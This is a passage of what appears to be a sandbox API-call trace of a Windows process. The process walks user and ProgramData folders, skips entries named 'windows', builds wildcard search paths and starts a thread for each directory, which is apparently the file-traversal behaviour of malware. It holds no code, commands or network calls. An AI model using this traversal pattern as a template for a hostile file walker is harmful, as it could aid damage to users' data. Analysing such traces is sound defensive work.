ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ab0 [0040.306] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.306] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.306] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.306] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.306] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66fe9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x93e4774a, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0040.306] lstrcmpW (lpString1=".", lpString2="Local") returned -1 [0040.307] lstrcmpW (lpString1="..", lpString2="Local") returned -1 [0040.307] lstrcmpiW (lpString1="windows", lpString2="Local") returned 1 [0040.307] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\*.*" [0040.307] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\*.*") returned 32 [0040.307] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\", lpString2="Local" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local" [0040.307] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" [0040.307] GlobalMemoryStatus (in: lpBuffer=0xda8fd10 | out: lpBuffer=0xda8fd10) [0040.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x974a298, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.308] CloseHandle (hObject=0x270) returned 1 [0040.308] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0040.308] lstrcmpW (lpString1=".", lpString2="LocalLow") returned -1 [0040.308] lstrcmpW (lpString1="..", lpString2="LocalLow") returned -1 [0040.308] lstrcmpiW (lpString1="windows", lpString2="LocalLow") returned 1 [0040.308] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\*.*" [0040.308] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\*.*") returned 32 [0040.308] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\", lpString2="LocalLow" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow" [0040.308] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*.*" [0040.308] GlobalMemoryStatus (in: lpBuffer=0xda8fd10 | out: lpBuffer=0xda8fd10) [0040.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x971a1c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.309] CloseHandle (hObject=0x270) returned 1 [0040.309] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0040.309] lstrcmpW (lpString1=".", lpString2="Roaming") returned -1 [0040.309] lstrcmpW (lpString1="..", lpString2="Roaming") returned -1 [0040.309] lstrcmpiW (lpString1="windows", lpString2="Roaming") returned 1 [0040.309] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\*.*" [0040.309] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\*.*") returned 32 [0040.309] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\", lpString2="Roaming" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming" [0040.309] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*" [0040.309] GlobalMemoryStatus (in: lpBuffer=0xda8fd10 | out: lpBuffer=0xda8fd10) [0040.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5bd0048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.310] CloseHandle (hObject=0x270) returned 1 [0040.310] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0040.310] FindClose (in: hFindFile=0x5a5ab0 | out: hFindFile=0x5a5ab0) returned 1 Thread: id = 175 os_tid = 0x7c4 [0040.311] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*", lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ab0 [0040.311] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.311] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.311] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.311] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.311] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0040.311] lstrcmpW (lpString1=".", lpString2="Assistance") returned -1 [0040.311] lstrcmpW (lpString1="..", lpString2="Assistance") returned -1 [0040.311] lstrcmpiW (lpString1="windows", lpString2="Assistance") returned 1 [0040.312] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.312] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Assistance" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance" [0040.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*.*" [0040.312] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.312] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9762300, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.313] CloseHandle (hObject=0x270) returned 1 [0040.313] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0040.313] lstrcmpW (lpString1=".", lpString2="Crypto") returned -1 [0040.313] lstrcmpW (lpString1="..", lpString2="Crypto") returned -1 [0040.313] lstrcmpiW (lpString1="windows", lpString2="Crypto") returned 1 [0040.313] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.313] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.313] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Crypto" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto" [0040.313] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" [0040.313] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5be80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.314] CloseHandle (hObject=0x270) returned 1 [0040.314] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0040.315] lstrcmpW (lpString1=".", lpString2="Device Stage") returned -1 [0040.315] lstrcmpW (lpString1="..", lpString2="Device Stage") returned -1 [0040.315] lstrcmpiW (lpString1="windows", lpString2="Device Stage") returned 1 [0040.317] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.317] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.317] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Device Stage" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage" [0040.317] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*" [0040.317] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d56b50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.318] CloseHandle (hObject=0x270) returned 1 [0040.318] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0040.318] lstrcmpW (lpString1=".", lpString2="DeviceSync") returned -1 [0040.318] lstrcmpW (lpString1="..", lpString2="DeviceSync") returned -1 [0040.318] lstrcmpiW (lpString1="windows", lpString2="DeviceSync") returned 1 [0040.320] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.320] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.320] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="DeviceSync" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync" [0040.320] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*" [0040.320] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d6ebb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.321] CloseHandle (hObject=0x270) returned 1 [0040.321] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1 [0040.321] lstrcmpW (lpString1=".", lpString2="DRM") returned -1 [0040.321] lstrcmpW (lpString1="..", lpString2="DRM") returned -1 [0040.321] lstrcmpiW (lpString1="windows", lpString2="DRM") returned 1 [0040.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.323] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.323] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="DRM" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM" [0040.323] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*.*" [0040.323] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d86c20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.324] CloseHandle (hObject=0x270) returned 1 [0040.324] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eHome", cAlternateFileName="")) returned 1 [0040.324] lstrcmpW (lpString1=".", lpString2="eHome") returned -1 [0040.324] lstrcmpW (lpString1="..", lpString2="eHome") returned -1 [0040.324] lstrcmpiW (lpString1="windows", lpString2="eHome") returned 1 [0040.326] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.326] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.326] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="eHome" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome" [0040.326] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*.*" [0040.326] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d9ec88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.327] CloseHandle (hObject=0x270) returned 1 [0040.327] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0040.327] lstrcmpW (lpString1=".", lpString2="Event Viewer") returned -1 [0040.327] lstrcmpW (lpString1="..", lpString2="Event Viewer") returned -1 [0040.327] lstrcmpiW (lpString1="windows", lpString2="Event Viewer") returned 1 [0040.329] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.329] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.329] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Event Viewer" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer" [0040.329] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*" [0040.329] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.329] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10db6cf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.330] CloseHandle (hObject=0x270) returned 1 [0040.330] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0040.330] lstrcmpW (lpString1=".", lpString2="IdentityCRL") returned -1 [0040.330] lstrcmpW (lpString1="..", lpString2="IdentityCRL") returned -1 [0040.330] lstrcmpiW (lpString1="windows", lpString2="IdentityCRL") returned 1 [0040.332] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.332] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.332] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="IdentityCRL" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL" [0040.332] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" [0040.332] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.332] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10dced58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.333] CloseHandle (hObject=0x270) returned 1 [0040.333] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0040.333] lstrcmpW (lpString1=".", lpString2="Media Player") returned -1 [0040.333] lstrcmpW (lpString1="..", lpString2="Media Player") returned -1 [0040.333] lstrcmpiW (lpString1="windows", lpString2="Media Player") returned 1 [0040.335] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.335] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.335] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Media Player" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player" [0040.335] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*.*" [0040.335] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.335] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10de6dc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.336] CloseHandle (hObject=0x270) returned 1 [0040.336] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1 [0040.336] lstrcmpW 